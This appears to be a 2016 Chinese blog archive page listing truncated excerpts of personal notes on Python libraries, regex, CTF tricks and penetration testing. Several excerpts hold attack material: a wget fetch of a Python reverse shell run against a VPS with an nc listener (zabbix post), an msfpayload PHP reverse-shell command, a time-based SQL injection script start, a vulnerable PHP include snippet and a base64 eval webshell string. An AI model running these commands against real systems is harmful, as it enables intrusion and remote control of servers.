2016 年 4月 14 日随笔档案 - lly001

常用服务对应的正则

摘要： ftp|21|^220.*?ftp|^220-ssh|22|^ssh-telnet|23|^\xff[\xfa-\xfe]|^\x54\x65\x6csmtp|25|^220.*?smtpdns|53|pop3|110|\+OK.*?pop3NetBIOS|139|imap|143|^\* OK.* 阅读全文

posted @ 2016-04-14 22:25 lly001 阅读(191) 评论(0) 推荐(0)

re

摘要： from:http://www.cnblogs.com/dreamer-fish/p/5282679.html 举例：正则表达式可以包含一些可选标志修饰符来控制匹配的模式。修饰符被指定为一个可选的标志。多个标志可以通过按位 OR(|) 它们来指定。如 re.I | re.M 被设置成 I 和 M 阅读全文

posted @ 2016-04-14 21:51 lly001 阅读(401) 评论(0) 推荐(0)

requests

摘要： >>>import requests>>> r = requests.get('http://www.zhidaow.com') # 发送请求>>> r.status_code # 返回码200>>> r.headers['content-type'] # 返回头部信息'text/html; cha 阅读全文

posted @ 2016-04-14 14:24 lly001 阅读(174) 评论(0) 推荐(0)

httplib

摘要：可爆破目录 #coding=gbkimport httplibconn = httplib.HTTPConnection("www.google.cn")conn.request('get', '/')print conn.getresponse().read()conn.close() httpl 阅读全文

posted @ 2016-04-14 14:23 lly001 阅读(224) 评论(0) 推荐(0)

Cookielib

摘要： Cookielib模块主要的对象有CookieJar、FileCookieJar、MozillaCookieJar、LWPCookieJar 它们的关系：CookieJar —-派生—->FileCookieJar —-派生—–>MozillaCookieJar和LWPCookieJar 获取Coo 阅读全文

posted @ 2016-04-14 14:22 lly001 阅读(259) 评论(0) 推荐(0)

urllib2

摘要： import urllib2response = urllib2.urlopen("http://www.baidu.com")print response.read() urlopen(url, data, timeout) 构造Requset import urllib2 request = u 阅读全文

posted @ 2016-04-14 14:21 lly001 阅读(156) 评论(0) 推荐(0)

mysql提权笔记

摘要：最近小菜遇到mysql提权，总是会搞错，就记记笔记吧！以后方便用先说手工吧！ mysql<5.0，导出路径随意；5.0<=mysql<5.1，则需要导出至目标服务器的系统目录（如：system32），否则在下一步操作中你会看到“No paths allowed for shared library 阅读全文

posted @ 2016-04-14 14:20 lly001 阅读(411) 评论(0) 推荐(0)

Python Queue实现生产与消费

摘要： Python Queue模块详解 from：https://blog.linuxeye.com/334.html Python中，队列是线程间最常用的交换数据的形式。Queue模块是提供队列操作的模块，虽然简单易用，但是不小心的话，还是会出现一些意外。创建一个“队列”对象import Queueq 阅读全文

posted @ 2016-04-14 14:19 lly001 阅读(319) 评论(0) 推荐(0)

[firefox+plug-n-hack]轻松地配置burpsuite代理https流量

摘要： http://zone.wooyun.org/content/25982 需要用到firefox的插件plug-n-hack下载https://raw.githubusercontent.com/mozmark/ringleader/master/fx_pnh.xpi在firefox中选择从文件中安阅读全文

posted @ 2016-04-14 14:19 lly001 阅读(541) 评论(0) 推荐(0)

小菜的正则（备忘而已）

摘要：为接下来的学习做铺垫从文本中匹配ip，并返回ip的一个列表 >>> line = "192.31.31.1 wfffwqfwqfqfqfqfq">>> ip = re.findall('(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])',line)>>> i 阅读全文

posted @ 2016-04-14 14:17 lly001 阅读(138) 评论(0) 推荐(0)

redis小结

该文被密码保护。阅读全文

posted @ 2016-04-14 14:16 lly001 阅读(54) 评论(0) 推荐(0)

jenkins

该文被密码保护。阅读全文

posted @ 2016-04-14 14:16 lly001 阅读(24) 评论(0) 推荐(0)

SQL注入脚本(基于时间)

摘要： #encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Charse... 阅读全文

posted @ 2016-04-14 14:14 lly001 阅读(669) 评论(0) 推荐(0)

python扫描内网banner信息

摘要：小菜自己无聊写着玩，主要纪念以前的逗逼学习，可以改IPy 阅读全文

posted @ 2016-04-14 14:13 lly001 阅读(228) 评论(0) 推荐(0)

一次zabbix的渗透

摘要： wget http://xxxxxxx:8888/back.py -O /tmp/1.py 写入python反弹马反弹到vps python /tmp/back.py IP port 执行python反弹马仪表盘执行命令 vps上监听nc -l -vv -p8080得交互shell 之后慢慢玩阅读全文

posted @ 2016-04-14 14:11 lly001 阅读(447) 评论(0) 推荐(0)

Tips

摘要： 1、Md5加密 & Base64编解码#! /usr/bin/env python# -*- coding: utf-8 -*- import md5from base64 import b64encode,b64decodeprint(md5.md5('123456').hexdigest())p 阅读全文

posted @ 2016-04-14 14:10 lly001 阅读(176) 评论(0) 推荐(0)

IPy

摘要： IPy生成网段列表from IPy import IPip = IP('192.168.0.0/16')print ip.len()for x in ip:print (x) ip的属性，'PUBLIC'，'PRIVATE'ip = IPy.IP('12.3.1.3')ip.iptype() 通过s 阅读全文

posted @ 2016-04-14 14:09 lly001 阅读(377) 评论(0) 推荐(0)

文件读取漏洞路径收集

摘要： 1.LINUX常见路径： 2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘） 3.网站相对路径: 阅读全文

posted @ 2016-04-14 14:08 lly001 阅读(350) 评论(0) 推荐(0)

argparse

摘要： import argparse def test(a,b): print int(a)+int(b) parser = argparse.ArgumentParser() parser.add_argument("-x","--x",dest="a",default=1, type=int, help='the first argument') parser.ad... 阅读全文

posted @ 2016-04-14 14:07 lly001 阅读(115) 评论(0) 推荐(0)

代码审计之配置

摘要： register_globals:php<5.4.0 PHP_INI_ALL:可在任何地方设置<?phpif($user == 'admin'){echo 'true';}?> allow_url_include:在5.2.0及以后默认off PHP_INI_ALL:可在任何地方设置（allow_u 阅读全文

posted @ 2016-04-14 14:06 lly001 阅读(146) 评论(0) 推荐(0)

ctf之加密

摘要： from:http://drops.wooyun.org/tips/10002 0x01 Base64 Base64:ZXZhbCgkX1BPU1RbcDRuOV96MV96aDNuOV9qMXVfU2gxX0oxM10pNTU2NJC3ODHHYWJIZ3P4ZWY= Base64编码要求把3个8 阅读全文

posted @ 2016-04-14 14:05 lly001 阅读(616) 评论(0) 推荐(0)

内网渗透中的反弹Shell与端口转发

摘要： from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一：生成php反弹脚本msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php 将阅读全文

posted @ 2016-04-14 14:04 lly001 阅读(1314) 评论(0) 推荐(0)

利用zip(或者phar)协议进行本地文件包含

摘要： $include_file=$_GET[include_file];if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ){require( $include_file );} 1.ph 阅读全文

posted @ 2016-04-14 14:03 lly001 阅读(471) 评论(0) 推荐(0)

Apache安全配置方案

摘要： Apache安全配置方案 from:http://drops.wooyun.org/%e8%bf%90%e7%bb%b4%e5%ae%89%e5%85%a8/2727 apache的一些配置主要是通过httpd.conf来实现的，但是可以在httpd.conf中开启对.htaccess的支持，然后在阅读全文

posted @ 2016-04-14 14:00 lly001 阅读(279) 评论(0) 推荐(0)

检测php网站是否已经被攻破

摘要： from :http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/ http://drops.wooyun.org/web/2718 0x01 查看访问日志PREMOVED - - [01/ 阅读全文

posted @ 2016-04-14 13:59 lly001 阅读(148) 评论(0) 推荐(0)

sql

摘要： index.php~备份文件下载，txt,unicode编码，phpjm解密（http://tool.lu/php/）$test = $_GET['test'];$test = md5($test);if($test = '0'){print "flag{XXXXX}"; }elseprint "y 阅读全文

posted @ 2016-04-14 13:56 lly001 阅读(149) 评论(0) 推荐(0)

image

摘要： copy /B 1.jpg+2.jpg new.jpg 生成图用Stegsolve的file format查看文件格式附带上一些图片格式的幻数，方便查阅。PNG = ‰PNG (89504E47)GIF = GIF89a (47494638)JPG = ???à JFIF (FFD8FF)BMP 阅读全文

posted @ 2016-04-14 13:54 lly001 阅读(303) 评论(0) 推荐(0)

lly-lly